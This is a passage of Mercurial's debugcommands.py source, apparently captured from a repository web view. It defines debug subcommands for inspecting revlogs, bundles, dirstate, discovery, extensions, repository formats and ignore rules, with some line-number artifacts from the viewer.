util: don't log low-level I/O calls for HTTP peer...
Gregory Szorc
r37062:d3a9036d default
# debugcommands.py - command processing for debug* commands
#
# Copyright 2005-2016 Matt Mackall <mpm@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.

from __future__ import absolute_import

import codecs
import collections
import difflib
import errno
import operator
import os
import random
import re
import socket
import ssl
import stat
import string
import subprocess
import sys
import tempfile
import time

from .i18n import _
from .node import (
    bin,
    hex,
    nullhex,
    nullid,
    nullrev,
    short,
)
from . import (
    bundle2,
    changegroup,
    cmdutil,
    color,
    context,
    dagparser,
    dagutil,
    encoding,
    error,
    exchange,
    extensions,
    filemerge,
    fileset,
    formatter,
    hg,
    httppeer,
    localrepo,
    lock as lockmod,
    logcmdutil,
    merge as mergemod,
    obsolete,
    obsutil,
    phases,
    policy,
    pvec,
    pycompat,
    registrar,
    repair,
    revlog,
    revset,
    revsetlang,
    scmutil,
    setdiscovery,
    simplemerge,
    smartset,
    sshpeer,
    sslutil,
    streamclone,
    templater,
    treediscovery,
    upgrade,
    url as urlmod,
    util,
    vfs as vfsmod,
    wireprotoserver,
)
from .utils import dateutil

release = lockmod.release

command = registrar.command()

@command('debugancestor', [], _('[INDEX] REV1 REV2'), optionalrepo=True)
def debugancestor(ui, repo, *args):
    """find the ancestor revision of two revisions in a given index"""
    if len(args) == 3:
        index, rev1, rev2 = args
        r = revlog.revlog(vfsmod.vfs(pycompat.getcwd(), audit=False), index)
        lookup = r.lookup
    elif len(args) == 2:
        if not repo:
            raise error.Abort(_('there is no Mercurial repository here '
                                '(.hg not found)'))
        rev1, rev2 = args
        r = repo.changelog
        lookup = repo.lookup
    else:
        raise error.Abort(_('either two or three arguments required'))
    a = r.ancestor(lookup(rev1), lookup(rev2))
    ui.write('%d:%s\n' % (r.rev(a), hex(a)))

@command('debugapplystreamclonebundle', [], 'FILE')
def debugapplystreamclonebundle(ui, repo, fname):
    """apply a stream clone bundle file"""
    f = hg.openpath(ui, fname)
    gen = exchange.readbundle(ui, f, fname)
    gen.apply(repo)

@command('debugbuilddag',
    [('m', 'mergeable-file', None, _('add single file mergeable changes')),
     ('o', 'overwritten-file', None, _('add single file all revs overwrite')),
     ('n', 'new-file', None, _('add new file at each rev'))],
    _('[OPTION]... [TEXT]'))
def debugbuilddag(ui, repo, text=None,
                  mergeable_file=False,
                  overwritten_file=False,
                  new_file=False):
    """builds a repo with a given DAG from scratch in the current empty repo

    The description of the DAG is read from stdin if not given on the
    command line.

    Elements:

    - "+n" is a linear run of n nodes based on the current default parent
    - "." is a single node based on the current default parent
    - "$" resets the default parent to null (implied at the start);
      otherwise the default parent is always the last node created
    - "<p" sets the default parent to the backref p
    - "*p" is a fork at parent p, which is a backref
    - "*p1/p2" is a merge of parents p1 and p2, which are backrefs
    - "/p2" is a merge of the preceding node and p2
    - ":tag" defines a local tag for the preceding node
    - "@branch" sets the named branch for subsequent nodes
    - "#...\\n" is a comment up to the end of the line

    Whitespace between the above elements is ignored.

    A backref is either

    - a number n, which references the node curr-n, where curr is the current
      node, or
    - the name of a local tag you placed earlier using ":tag", or
    - empty to denote the default parent.
    All string-valued elements are either strictly alphanumeric, or must
    be enclosed in double quotes ("..."), with "\\" as escape character.
    """

    if text is None:
        ui.status(_("reading DAG from stdin\n"))
        text = ui.fin.read()

    cl = repo.changelog
    if len(cl) > 0:
        raise error.Abort(_('repository is not empty'))

    # determine number of revs in DAG
    total = 0
    for type, data in dagparser.parsedag(text):
        if type == 'n':
            total += 1

    if mergeable_file:
        linesperrev = 2
        # make a file with k lines per rev
        initialmergedlines = ['%d' % i for i in xrange(0, total * linesperrev)]
        initialmergedlines.append("")

    tags = []

    wlock = lock = tr = None
    try:
        wlock = repo.wlock()
        lock = repo.lock()
        tr = repo.transaction("builddag")

        at = -1
        atbranch = 'default'
        nodeids = []
        id = 0
        ui.progress(_('building'), id, unit=_('revisions'), total=total)
        for type, data in dagparser.parsedag(text):
            if type == 'n':
                ui.note(('node %s\n' % pycompat.bytestr(data)))
                id, ps = data

                files = []
                filecontent = {}

                p2 = None
                if mergeable_file:
                    fn = "mf"
                    p1 = repo[ps[0]]
                    if len(ps) > 1:
                        p2 = repo[ps[1]]
                        pa = p1.ancestor(p2)
                        base, local, other = [x[fn].data() for x in (pa, p1,
                                                                     p2)]
                        m3 = simplemerge.Merge3Text(base, local, other)
                        ml = [l.strip() for l in m3.merge_lines()]
                        ml.append("")
                    elif at > 0:
                        ml = p1[fn].data().split("\n")
                    else:
                        ml = initialmergedlines
                    ml[id * linesperrev] += " r%i" % id
                    mergedtext = "\n".join(ml)
                    files.append(fn)
                    filecontent[fn] = mergedtext

                if overwritten_file:
                    fn = "of"
                    files.append(fn)
                    filecontent[fn] = "r%i\n" % id

                if new_file:
                    fn = "nf%i" % id
                    files.append(fn)
                    filecontent[fn] = "r%i\n" % id
                    if len(ps) > 1:
                        if not p2:
                            p2 = repo[ps[1]]
                        for fn in p2:
                            if fn.startswith("nf"):
                                files.append(fn)
                                filecontent[fn] = p2[fn].data()

                def fctxfn(repo, cx, path):
                    if path in filecontent:
                        return context.memfilectx(repo, cx, path,
                                                  filecontent[path])
                    return None

                if len(ps) == 0 or ps[0] < 0:
                    pars = [None, None]
                elif len(ps) == 1:
                    pars = [nodeids[ps[0]], None]
                else:
                    pars = [nodeids[p] for p in ps]
                cx = context.memctx(repo, pars, "r%i" % id, files, fctxfn,
                                    date=(id, 0),
                                    user="debugbuilddag",
                                    extra={'branch': atbranch})
                nodeid = repo.commitctx(cx)
                nodeids.append(nodeid)
                at = id
            elif type == 'l':
                id, name = data
                ui.note(('tag %s\n' % name))
                tags.append("%s %s\n" % (hex(repo.changelog.node(id)), name))
            elif type == 'a':
                ui.note(('branch %s\n' % data))
                atbranch = data
            ui.progress(_('building'), id, unit=_('revisions'), total=total)
        tr.close()

        if tags:
            repo.vfs.write("localtags", "".join(tags))
    finally:
        ui.progress(_('building'), None)
        release(tr, lock, wlock)

def _debugchangegroup(ui, gen, all=None, indent=0, **opts):
    indent_string = ' ' * indent
    if all:
        ui.write(("%sformat: id, p1, p2, cset, delta base, len(delta)\n")
                 % indent_string)

        def showchunks(named):
            ui.write("\n%s%s\n" % (indent_string, named))
            for deltadata in gen.deltaiter():
                node, p1, p2, cs, deltabase, delta, flags = deltadata
                ui.write("%s%s %s %s %s %s %d\n" %
                         (indent_string, hex(node), hex(p1), hex(p2),
                          hex(cs), hex(deltabase), len(delta)))

        chunkdata = gen.changelogheader()
        showchunks("changelog")
        chunkdata = gen.manifestheader()
        showchunks("manifest")
        for chunkdata in iter(gen.filelogheader, {}):
            fname = chunkdata['filename']
            showchunks(fname)
    else:
        if isinstance(gen, bundle2.unbundle20):
            raise error.Abort(_('use debugbundle2 for this file'))
        chunkdata = gen.changelogheader()
        for deltadata in gen.deltaiter():
            node, p1, p2, cs, deltabase, delta, flags = deltadata
            ui.write("%s%s\n" % (indent_string, hex(node)))

def _debugobsmarkers(ui, part, indent=0, **opts):
    """display version and markers contained in 'data'"""
    opts = pycompat.byteskwargs(opts)
    data = part.read()
    indent_string = ' ' * indent
    try:
        version, markers = obsolete._readmarkers(data)
    except error.UnknownVersion as exc:
        msg = "%sunsupported version: %s (%d bytes)\n"
        msg %= indent_string, exc.version, len(data)
        ui.write(msg)
    else:
        msg = "%sversion: %d (%d bytes)\n"
        msg %= indent_string, version, len(data)
        ui.write(msg)
        fm = ui.formatter('debugobsolete', opts)
        for rawmarker in sorted(markers):
            m = obsutil.marker(None, rawmarker)
            fm.startitem()
            fm.plain(indent_string)
            cmdutil.showmarker(fm, m)
        fm.end()

def _debugphaseheads(ui, data, indent=0):
323 323 """display version and markers contained in 'data'"""
    indent_string = ' ' * indent
    headsbyphase = phases.binarydecode(data)
    for phase in phases.allphases:
        for head in headsbyphase[phase]:
            ui.write(indent_string)
            ui.write('%s %s\n' % (hex(head), phases.phasenames[phase]))

def _quasirepr(thing):
    if isinstance(thing, (dict, util.sortdict, collections.OrderedDict)):
        return '{%s}' % (
            b', '.join(b'%s: %s' % (k, thing[k]) for k in sorted(thing)))
    return pycompat.bytestr(repr(thing))

def _debugbundle2(ui, gen, all=None, **opts):
    """lists the contents of a bundle2"""
    if not isinstance(gen, bundle2.unbundle20):
        raise error.Abort(_('not a bundle2 file'))
    ui.write(('Stream params: %s\n' % _quasirepr(gen.params)))
    parttypes = opts.get(r'part_type', [])
    for part in gen.iterparts():
        if parttypes and part.type not in parttypes:
            continue
        ui.write('%s -- %s\n' % (part.type, _quasirepr(part.params)))
        if part.type == 'changegroup':
            version = part.params.get('version', '01')
            cg = changegroup.getunbundler(version, part, 'UN')
            if not ui.quiet:
                _debugchangegroup(ui, cg, all=all, indent=4, **opts)
        if part.type == 'obsmarkers':
            if not ui.quiet:
                _debugobsmarkers(ui, part, indent=4, **opts)
        if part.type == 'phase-heads':
            if not ui.quiet:
                _debugphaseheads(ui, part, indent=4)

@command('debugbundle',
    [('a', 'all', None, _('show all details')),
     ('', 'part-type', [], _('show only the named part type')),
     ('', 'spec', None, _('print the bundlespec of the bundle'))],
    _('FILE'),
    norepo=True)
def debugbundle(ui, bundlepath, all=None, spec=None, **opts):
    """lists the contents of a bundle"""
    with hg.openpath(ui, bundlepath) as f:
        if spec:
            spec = exchange.getbundlespec(ui, f)
            ui.write('%s\n' % spec)
            return

        gen = exchange.readbundle(ui, f, bundlepath)
        if isinstance(gen, bundle2.unbundle20):
            return _debugbundle2(ui, gen, all=all, **opts)
        _debugchangegroup(ui, gen, all=all, **opts)

@command('debugcapabilities',
    [], _('PATH'),
    norepo=True)
def debugcapabilities(ui, path, **opts):
    """lists the capabilities of a remote peer"""
    opts = pycompat.byteskwargs(opts)
    peer = hg.peer(ui, opts, path)
    caps = peer.capabilities()
    ui.write(('Main capabilities:\n'))
    for c in sorted(caps):
        ui.write(('  %s\n') % c)
    b2caps = bundle2.bundle2caps(peer)
    if b2caps:
        ui.write(('Bundle2 capabilities:\n'))
        for key, values in sorted(b2caps.iteritems()):
            ui.write(('  %s\n') % key)
            for v in values:
                ui.write(('    %s\n') % v)

@command('debugcheckstate', [], '')
def debugcheckstate(ui, repo):
    """validate the correctness of the current dirstate"""
    parent1, parent2 = repo.dirstate.parents()
    m1 = repo[parent1].manifest()
    m2 = repo[parent2].manifest()
    errors = 0
    for f in repo.dirstate:
        state = repo.dirstate[f]
        if state in "nr" and f not in m1:
            ui.warn(_("%s in state %s, but not in manifest1\n") % (f, state))
            errors += 1
        if state in "a" and f in m1:
            ui.warn(_("%s in state %s, but also in manifest1\n") % (f, state))
            errors += 1
        if state in "m" and f not in m1 and f not in m2:
            ui.warn(_("%s in state %s, but not in either manifest\n") %
                    (f, state))
            errors += 1
    for f in m1:
        state = repo.dirstate[f]
        if state not in "nrm":
            ui.warn(_("%s in manifest1, but listed as state %s") % (f, state))
            errors += 1
    if errors:
        # use a name that does not shadow the error module, which the
        # raise below needs
        errstr = _(".hg/dirstate inconsistent with current parent's manifest")
        raise error.Abort(errstr)

@command('debugcolor',
    [('', 'style', None, _('show all configured styles'))],
    'hg debugcolor')
def debugcolor(ui, repo, **opts):
429 429 """show available color, effects or style"""
    ui.write(('color mode: %s\n') % ui._colormode)
    if opts.get(r'style'):
        return _debugdisplaystyle(ui)
    else:
        return _debugdisplaycolor(ui)

def _debugdisplaycolor(ui):
    ui = ui.copy()
    ui._styles.clear()
    for effect in color._activeeffects(ui).keys():
        ui._styles[effect] = effect
    if ui._terminfoparams:
        for k, v in ui.configitems('color'):
            if k.startswith('color.'):
                ui._styles[k] = k[6:]
            elif k.startswith('terminfo.'):
                ui._styles[k] = k[9:]
    ui.write(_('available colors:\n'))
    # sort labels with '_' after the others to group the '_background' entries
    items = sorted(ui._styles.items(),
                   key=lambda i: ('_' in i[0], i[0], i[1]))
    for colorname, label in items:
        ui.write(('%s\n') % colorname, label=label)

def _debugdisplaystyle(ui):
    ui.write(_('available style:\n'))
    width = max(len(s) for s in ui._styles)
    for label, effects in sorted(ui._styles.items()):
        ui.write('%s' % label, label=label)
        if effects:
            # 50
            ui.write(': ')
            ui.write(' ' * (max(0, width - len(label))))
            ui.write(', '.join(ui.label(e, e) for e in effects.split()))
        ui.write('\n')

@command('debugcreatestreamclonebundle', [], 'FILE')
def debugcreatestreamclonebundle(ui, repo, fname):
    """create a stream clone bundle file

    Stream bundles are special bundles that are essentially archives of
    revlog files. They are commonly used for cloning very quickly.
    """
    # TODO we may want to turn this into an abort when this functionality
    # is moved into `hg bundle`.
    if phases.hassecret(repo):
        ui.warn(_('(warning: stream clone bundle will contain secret '
                  'revisions)\n'))

    requirements, gen = streamclone.generatebundlev1(repo)
    changegroup.writechunks(ui, gen, fname)

    ui.write(_('bundle requirements: %s\n') % ', '.join(sorted(requirements)))

@command('debugdag',
    [('t', 'tags', None, _('use tags as labels')),
     ('b', 'branches', None, _('annotate with branch names')),
     ('', 'dots', None, _('use dots for runs')),
     ('s', 'spaces', None, _('separate elements by spaces'))],
    _('[OPTION]... [FILE [REV]...]'),
    optionalrepo=True)
def debugdag(ui, repo, file_=None, *revs, **opts):
    """format the changelog or an index DAG as a concise textual description

    If you pass a revlog index, the revlog's DAG is emitted. If you list
    revision numbers, they get labeled in the output as rN.

    Otherwise, the changelog DAG of the current repo is emitted.
    """
    spaces = opts.get(r'spaces')
    dots = opts.get(r'dots')
    if file_:
        rlog = revlog.revlog(vfsmod.vfs(pycompat.getcwd(), audit=False),
                             file_)
        revs = set((int(r) for r in revs))
        def events():
            for r in rlog:
                yield 'n', (r, list(p for p in rlog.parentrevs(r)
                                    if p != -1))
                if r in revs:
                    yield 'l', (r, "r%i" % r)
    elif repo:
        cl = repo.changelog
        tags = opts.get(r'tags')
        branches = opts.get(r'branches')
        if tags:
            labels = {}
            for l, n in repo.tags().items():
                labels.setdefault(cl.rev(n), []).append(l)
        def events():
            b = "default"
            for r in cl:
                if branches:
                    newb = cl.read(cl.node(r))[5]['branch']
                    if newb != b:
                        yield 'a', newb
                        b = newb
                yield 'n', (r, list(p for p in cl.parentrevs(r)
                                    if p != -1))
                if tags:
                    ls = labels.get(r)
                    if ls:
                        for l in ls:
                            yield 'l', (r, l)
    else:
        raise error.Abort(_('need repo for changelog dag'))

    for line in dagparser.dagtextlines(events(),
                                       addspaces=spaces,
                                       wraplabels=True,
                                       wrapannotations=True,
                                       wrapnonlinear=dots,
                                       usedots=dots,
                                       maxlinewidth=70):
        ui.write(line)
        ui.write("\n")

@command('debugdata', cmdutil.debugrevlogopts, _('-c|-m|FILE REV'))
def debugdata(ui, repo, file_, rev=None, **opts):
    """dump the contents of a data file revision"""
    opts = pycompat.byteskwargs(opts)
    if opts.get('changelog') or opts.get('manifest') or opts.get('dir'):
        if rev is not None:
            raise error.CommandError('debugdata', _('invalid arguments'))
        file_, rev = None, file_
    elif rev is None:
        raise error.CommandError('debugdata', _('invalid arguments'))
    r = cmdutil.openrevlog(repo, 'debugdata', file_, opts)
    try:
        ui.write(r.revision(r.lookup(rev), raw=True))
    except KeyError:
        raise error.Abort(_('invalid revision identifier %s') % rev)

@command('debugdate',
    [('e', 'extended', None, _('try extended date formats'))],
    _('[-e] DATE [RANGE]'),
    norepo=True, optionalrepo=True)
def debugdate(ui, date, range=None, **opts):
    """parse and display a date"""
    if opts[r"extended"]:
        d = dateutil.parsedate(date, util.extendeddateformats)
    else:
        d = dateutil.parsedate(date)
    ui.write(("internal: %d %d\n") % d)
    ui.write(("standard: %s\n") % dateutil.datestr(d))
    if range:
        m = dateutil.matchdate(range)
        ui.write(("match: %s\n") % m(d[0]))

@command('debugdeltachain',
    cmdutil.debugrevlogopts + cmdutil.formatteropts,
    _('-c|-m|FILE'),
    optionalrepo=True)
def debugdeltachain(ui, repo, file_=None, **opts):
    """dump information about delta chains in a revlog

    Output can be templatized. Available template keywords are:

    :``rev``:        revision number
    :``chainid``:    delta chain identifier (numbered by unique base)
    :``chainlen``:   delta chain length to this revision
    :``prevrev``:    previous revision in delta chain
    :``deltatype``:  role of delta / how it was computed
    :``compsize``:   compressed size of revision
    :``uncompsize``: uncompressed size of revision
    :``chainsize``:  total size of compressed revisions in chain
    :``chainratio``: total chain size divided by uncompressed revision size
                     (new delta chains typically start at ratio 2.00)
    :``lindist``:    linear distance from base revision in delta chain to end
                     of this revision
    :``extradist``:  total size of revisions not part of this delta chain from
                     base of delta chain to end of this revision; a measurement
                     of how much extra data we need to read/seek across to read
                     the delta chain for this revision
    :``extraratio``: extradist divided by chainsize; another representation of
                     how much unrelated data is needed to load this delta chain

    If the repository is configured to use the sparse read, additional keywords
    are available:

    :``readsize``:     total size of data read from the disk for a revision
                       (sum of the sizes of all the blocks)
    :``largestblock``: size of the largest block of data read from the disk
    :``readdensity``:  density of useful bytes in the data read from the disk
    :``srchunks``:     in how many data hunks the whole revision would be read

    The sparse read can be enabled with experimental.sparse-read = True
    """
    opts = pycompat.byteskwargs(opts)
    r = cmdutil.openrevlog(repo, 'debugdeltachain', file_, opts)
    index = r.index
    generaldelta = r.version & revlog.FLAG_GENERALDELTA
    withsparseread = getattr(r, '_withsparseread', False)

    def revinfo(rev):
        e = index[rev]
        compsize = e[1]
        uncompsize = e[2]
        chainsize = 0

        if generaldelta:
            if e[3] == e[5]:
                deltatype = 'p1'
            elif e[3] == e[6]:
                deltatype = 'p2'
            elif e[3] == rev - 1:
                deltatype = 'prev'
            elif e[3] == rev:
                deltatype = 'base'
            else:
                deltatype = 'other'
        else:
            if e[3] == rev:
                deltatype = 'base'
            else:
                deltatype = 'prev'

        chain = r._deltachain(rev)[0]
        for iterrev in chain:
            e = index[iterrev]
            chainsize += e[1]

        return compsize, uncompsize, deltatype, chain, chainsize

    fm = ui.formatter('debugdeltachain', opts)

    fm.plain('    rev  chain# chainlen     prev   delta       '
             'size    rawsize  chainsize     ratio   lindist extradist '
             'extraratio')
    if withsparseread:
        fm.plain('   readsize largestblk rddensity srchunks')
    fm.plain('\n')

    chainbases = {}
    for rev in r:
        comp, uncomp, deltatype, chain, chainsize = revinfo(rev)
        chainbase = chain[0]
        chainid = chainbases.setdefault(chainbase, len(chainbases) + 1)
        start = r.start
        length = r.length
        basestart = start(chainbase)
        revstart = start(rev)
        lineardist = revstart + comp - basestart
        extradist = lineardist - chainsize
        try:
            prevrev = chain[-2]
        except IndexError:
            prevrev = -1

        chainratio = float(chainsize) / float(uncomp)
        extraratio = float(extradist) / float(chainsize)

        fm.startitem()
        fm.write('rev chainid chainlen prevrev deltatype compsize '
                 'uncompsize chainsize chainratio lindist extradist '
                 'extraratio',
                 '%7d %7d %8d %8d %7s %10d %10d %10d %9.5f %9d %9d %10.5f',
                 rev, chainid, len(chain), prevrev, deltatype, comp,
                 uncomp, chainsize, chainratio, lineardist, extradist,
                 extraratio,
                 rev=rev, chainid=chainid, chainlen=len(chain),
                 prevrev=prevrev, deltatype=deltatype, compsize=comp,
                 uncompsize=uncomp, chainsize=chainsize,
                 chainratio=chainratio, lindist=lineardist,
                 extradist=extradist, extraratio=extraratio)
        if withsparseread:
            readsize = 0
            largestblock = 0
            srchunks = 0

            for revschunk in revlog._slicechunk(r, chain):
                srchunks += 1
                blkend = start(revschunk[-1]) + length(revschunk[-1])
                blksize = blkend - start(revschunk[0])

                readsize += blksize
                if largestblock < blksize:
                    largestblock = blksize

            readdensity = float(chainsize) / float(readsize)

            fm.write('readsize largestblock readdensity srchunks',
                     ' %10d %10d %9.5f %8d',
                     readsize, largestblock, readdensity, srchunks,
                     readsize=readsize, largestblock=largestblock,
                     readdensity=readdensity, srchunks=srchunks)

        fm.plain('\n')

    fm.end()

@command('debugdirstate|debugstate',
    [('', 'nodates', None, _('do not display the saved mtime')),
     ('', 'datesort', None, _('sort by saved mtime'))],
    _('[OPTION]...'))
def debugstate(ui, repo, **opts):
    """show the contents of the current dirstate"""

    nodates = opts.get(r'nodates')
    datesort = opts.get(r'datesort')

    timestr = ""
    if datesort:
        keyfunc = lambda x: (x[1][3], x[0])  # sort by mtime, then by filename
    else:
        keyfunc = None  # sort by filename
    for file_, ent in sorted(repo.dirstate._map.iteritems(), key=keyfunc):
        if ent[3] == -1:
            timestr = 'unset               '
        elif nodates:
            timestr = 'set                 '
        else:
            timestr = time.strftime(r"%Y-%m-%d %H:%M:%S ",
                                    time.localtime(ent[3]))
            timestr = encoding.strtolocal(timestr)
        if ent[1] & 0o20000:
            mode = 'lnk'
        else:
            mode = '%3o' % (ent[1] & 0o777 & ~util.umask)
        ui.write("%c %s %10d %s%s\n" % (ent[0], mode, ent[2], timestr, file_))
    for f in repo.dirstate.copies():
        ui.write(_("copy: %s -> %s\n") % (repo.dirstate.copied(f), f))

@command('debugdiscovery',
    [('', 'old', None, _('use old-style discovery')),
     ('', 'nonheads', None,
      _('use old-style discovery with non-heads included')),
     ('', 'rev', [], 'restrict discovery to this set of revs'),
    ] + cmdutil.remoteopts,
    _('[--rev REV] [OTHER]'))
def debugdiscovery(ui, repo, remoteurl="default", **opts):
    """runs the changeset discovery protocol in isolation"""
    opts = pycompat.byteskwargs(opts)
    remoteurl, branches = hg.parseurl(ui.expandpath(remoteurl))
    remote = hg.peer(repo, opts, remoteurl)
    ui.status(_('comparing with %s\n') % util.hidepassword(remoteurl))

    # make sure tests are repeatable
    random.seed(12323)

    def doit(pushedrevs, remoteheads, remote=remote):
        if opts.get('old'):
            if not util.safehasattr(remote, 'branches'):
                # enable in-client legacy support
                remote = localrepo.locallegacypeer(remote.local())
            common, _in, hds = treediscovery.findcommonincoming(repo, remote,
                                                                force=True)
            common = set(common)
            if not opts.get('nonheads'):
                ui.write(("unpruned common: %s\n") %
                         " ".join(sorted(short(n) for n in common)))
                dag = dagutil.revlogdag(repo.changelog)
                all = dag.ancestorset(dag.internalizeall(common))
                common = dag.externalizeall(dag.headsetofconnecteds(all))
        else:
            nodes = None
            if pushedrevs:
                revs = scmutil.revrange(repo, pushedrevs)
                nodes = [repo[r].node() for r in revs]
            common, any, hds = setdiscovery.findcommonheads(ui, repo, remote,
                                                            ancestorsof=nodes)
        common = set(common)
        rheads = set(hds)
        lheads = set(repo.heads())
        ui.write(("common heads: %s\n") %
                 " ".join(sorted(short(n) for n in common)))
        if lheads <= common:
            ui.write(("local is subset\n"))
        elif rheads <= common:
            ui.write(("remote is subset\n"))

    remoterevs, _checkout = hg.addbranchrevs(repo, remote, branches, revs=None)
    localrevs = opts['rev']
    doit(localrevs, remoterevs)

_chunksize = 4 << 10

@command('debugdownload',
    [
        ('o', 'output', '', _('path')),
    ],
    optionalrepo=True)
def debugdownload(ui, repo, url, output=None, **opts):
    """download a resource using Mercurial logic and config
    """
    fh = urlmod.open(ui, url, output)

    dest = ui
    if output:
        dest = open(output, "wb", _chunksize)
    try:
        data = fh.read(_chunksize)
        while data:
            dest.write(data)
            data = fh.read(_chunksize)
    finally:
        if output:
            dest.close()

@command('debugextensions', cmdutil.formatteropts, [], norepo=True)
def debugextensions(ui, **opts):
    '''show information about active extensions'''
    opts = pycompat.byteskwargs(opts)
    exts = extensions.extensions(ui)
    hgver = util.version()
    fm = ui.formatter('debugextensions', opts)
    for extname, extmod in sorted(exts, key=operator.itemgetter(0)):
        isinternal = extensions.ismoduleinternal(extmod)
        extsource = pycompat.fsencode(extmod.__file__)
        if isinternal:
            exttestedwith = []  # never expose magic string to users
        else:
            exttestedwith = getattr(extmod, 'testedwith', '').split()
        extbuglink = getattr(extmod, 'buglink', None)

        fm.startitem()

        if ui.quiet or ui.verbose:
            fm.write('name', '%s\n', extname)
        else:
            fm.write('name', '%s', extname)
            if isinternal or hgver in exttestedwith:
                fm.plain('\n')
            elif not exttestedwith:
                fm.plain(_(' (untested!)\n'))
            else:
                lasttestedversion = exttestedwith[-1]
                fm.plain(' (%s!)\n' % lasttestedversion)

        fm.condwrite(ui.verbose and extsource, 'source',
                     _('  location: %s\n'), extsource or "")

        if ui.verbose:
            fm.plain(_('  bundled: %s\n') % ['no', 'yes'][isinternal])
        fm.data(bundled=isinternal)

        fm.condwrite(ui.verbose and exttestedwith, 'testedwith',
                     _('  tested with: %s\n'),
                     fm.formatlist(exttestedwith, name='ver'))

        fm.condwrite(ui.verbose and extbuglink, 'buglink',
                     _('  bug reporting: %s\n'), extbuglink or "")

    fm.end()

@command('debugfileset',
    [('r', 'rev', '', _('apply the filespec on this revision'), _('REV'))],
    _('[-r REV] FILESPEC'))
def debugfileset(ui, repo, expr, **opts):
    '''parse and apply a fileset specification'''
    ctx = scmutil.revsingle(repo, opts.get(r'rev'), None)
    if ui.verbose:
        tree = fileset.parse(expr)
        ui.note(fileset.prettyformat(tree), "\n")

    for f in ctx.getfileset(expr):
        ui.write("%s\n" % f)

@command('debugformat',
    [] + cmdutil.formatteropts,
    _(''))
def debugformat(ui, repo, **opts):
    """display format information about the current repository

    Use --verbose to get extra information about current config value and
    Mercurial default."""
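    # Illustrative: plain output is one row per format variant with a
    # "repo" column; "hg debugformat -v" adds "config" and "default"
    # columns so the three values can be compared side by side.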
    opts = pycompat.byteskwargs(opts)
    maxvariantlength = max(len(fv.name) for fv in upgrade.allformatvariant)
    maxvariantlength = max(len('format-variant'), maxvariantlength)

    def makeformatname(name):
        return '%s:' + (' ' * (maxvariantlength - len(name)))

    fm = ui.formatter('debugformat', opts)
    if fm.isplain():
        def formatvalue(value):
            if util.safehasattr(value, 'startswith'):
                return value
            if value:
                return 'yes'
            else:
                return 'no'
    else:
        formatvalue = pycompat.identity

    fm.plain('format-variant')
    fm.plain(' ' * (maxvariantlength - len('format-variant')))
    fm.plain(' repo')
    if ui.verbose:
        fm.plain(' config default')
    fm.plain('\n')
    for fv in upgrade.allformatvariant:
        fm.startitem()
        repovalue = fv.fromrepo(repo)
        configvalue = fv.fromconfig(repo)

        if repovalue != configvalue:
            namelabel = 'formatvariant.name.mismatchconfig'
            repolabel = 'formatvariant.repo.mismatchconfig'
        elif repovalue != fv.default:
            namelabel = 'formatvariant.name.mismatchdefault'
            repolabel = 'formatvariant.repo.mismatchdefault'
        else:
            namelabel = 'formatvariant.name.uptodate'
            repolabel = 'formatvariant.repo.uptodate'

        fm.write('name', makeformatname(fv.name), fv.name,
                 label=namelabel)
        fm.write('repo', ' %3s', formatvalue(repovalue),
                 label=repolabel)
        if fv.default != configvalue:
            configlabel = 'formatvariant.config.special'
        else:
            configlabel = 'formatvariant.config.default'
        fm.condwrite(ui.verbose, 'config', ' %6s', formatvalue(configvalue),
                     label=configlabel)
        fm.condwrite(ui.verbose, 'default', ' %7s', formatvalue(fv.default),
                     label='formatvariant.default')
        fm.plain('\n')
    fm.end()

@command('debugfsinfo', [], _('[PATH]'), norepo=True)
def debugfsinfo(ui, path="."):
    """show information detected about current filesystem"""
    ui.write(('path: %s\n') % path)
    ui.write(('mounted on: %s\n') % (util.getfsmountpoint(path) or '(unknown)'))
    ui.write(('exec: %s\n') % (util.checkexec(path) and 'yes' or 'no'))
    ui.write(('fstype: %s\n') % (util.getfstype(path) or '(unknown)'))
    ui.write(('symlink: %s\n') % (util.checklink(path) and 'yes' or 'no'))
    ui.write(('hardlink: %s\n') % (util.checknlink(path) and 'yes' or 'no'))
    casesensitive = '(unknown)'
    try:
        with tempfile.NamedTemporaryFile(prefix='.debugfsinfo', dir=path) as f:
            casesensitive = util.fscasesensitive(f.name) and 'yes' or 'no'
    except OSError:
        pass
    ui.write(('case-sensitive: %s\n') % casesensitive)

@command('debuggetbundle',
    [('H', 'head', [], _('id of head node'), _('ID')),
     ('C', 'common', [], _('id of common node'), _('ID')),
     ('t', 'type', 'bzip2', _('bundle compression type to use'), _('TYPE'))],
    _('REPO FILE [-H|-C ID]...'),
    norepo=True)
def debuggetbundle(ui, repopath, bundlepath, head=None, common=None, **opts):
    """retrieves a bundle from a repo

    Every ID must be a full-length hex node id string. Saves the bundle to the
    given file.
    """
981 981 repo = hg.peer(ui, opts, repopath)
982 982 if not repo.capable('getbundle'):
983 983 raise error.Abort("getbundle() not supported by target repository")
984 984 args = {}
985 985 if common:
986 986 args[r'common'] = [bin(s) for s in common]
987 987 if head:
988 988 args[r'heads'] = [bin(s) for s in head]
989 989 # TODO: get desired bundlecaps from command line.
990 990 args[r'bundlecaps'] = None
991 991 bundle = repo.getbundle('debug', **args)
992 992
993 993 bundletype = opts.get('type', 'bzip2').lower()
994 994 btypes = {'none': 'HG10UN',
995 995 'bzip2': 'HG10BZ',
996 996 'gzip': 'HG10GZ',
997 997 'bundle2': 'HG20'}
998 998 bundletype = btypes.get(bundletype)
999 999 if bundletype not in bundle2.bundletypes:
1000 1000 raise error.Abort(_('unknown bundle type specified with --type'))
1001 1001 bundle2.writebundle(ui, bundle, bundlepath, bundletype)
1002 1002
1003 1003 @command('debugignore', [], '[FILE]')
1004 1004 def debugignore(ui, repo, *files, **opts):
1005 1005 """display the combined ignore pattern and information about ignored files
1006 1006
1007 1007 With no argument display the combined ignore pattern.
1008 1008
    Given space-separated file names, show whether each file is ignored and,
    if so, the ignore rule (file and line number) that matched it.
1011 1011 """
    ignore = repo.dirstate._ignore
    if not files:
        # Show all the patterns
        ui.write("%s\n" % pycompat.byterepr(ignore))
    else:
        m = scmutil.match(repo[None], pats=files)
        for f in m.files():
            nf = util.normpath(f)
            ignored = None
            ignoredata = None
            if nf != '.':
                if ignore(nf):
                    ignored = nf
                    ignoredata = repo.dirstate._ignorefileandline(nf)
                else:
                    for p in util.finddirs(nf):
                        if ignore(p):
                            ignored = p
                            ignoredata = repo.dirstate._ignorefileandline(p)
                            break
            if ignored:
                if ignored == nf:
                    ui.write(_("%s is ignored\n") % m.uipath(f))
                else:
                    ui.write(_("%s is ignored because of "
                               "containing folder %s\n")
                             % (m.uipath(f), ignored))
